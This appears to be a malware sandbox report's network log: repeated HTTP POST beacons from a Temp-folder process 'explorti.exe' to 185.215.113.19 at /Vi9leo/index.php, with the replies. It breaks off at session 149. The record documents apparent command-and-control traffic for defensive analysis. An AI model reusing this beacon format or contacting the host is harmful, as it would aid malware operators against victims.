Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.8	49838	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:27.253089905 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:27.998117924 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.8	49839	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:28.008049011 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.8	49840	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:28.138731003 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:28.985846996 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.8	49841	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:29.000998020 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:29.757936954 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.8	49842	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:29.878604889 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:30.619832993 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.8	49843	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:30.630714893 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:31.375890017 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.8	49844	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:31.488318920 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:32.254602909 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.8	49845	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:32.264257908 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:33.010915041 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.8	49846	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:33.131428003 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:33.923041105 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.8	49847	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:33.935417891 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:34.692317009 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.8	49848	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:34.816685915 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:35.615722895 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.8	49849	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:35.629739046 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:36.396419048 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.8	49850	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:36.520174980 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:37.494599104 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.8	49851	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:37.504358053 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:38.263320923 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.8	49852	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:38.380173922 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:39.147406101 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.8	49853	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:39.161921024 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:39.918128014 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.8	49854	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:40.036035061 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:40.785706043 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.8	49855	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:40.797863007 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:41.557820082 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.8	49856	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:41.676151991 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:42.465569973 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.8	49857	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:42.474647045 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:43.251970053 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.8	49858	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:43.370332956 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:44.108499050 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.8	49859	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:44.118272066 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:44.887579918 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.8	49860	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:45.005670071 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:45.856694937 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.8	49861	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
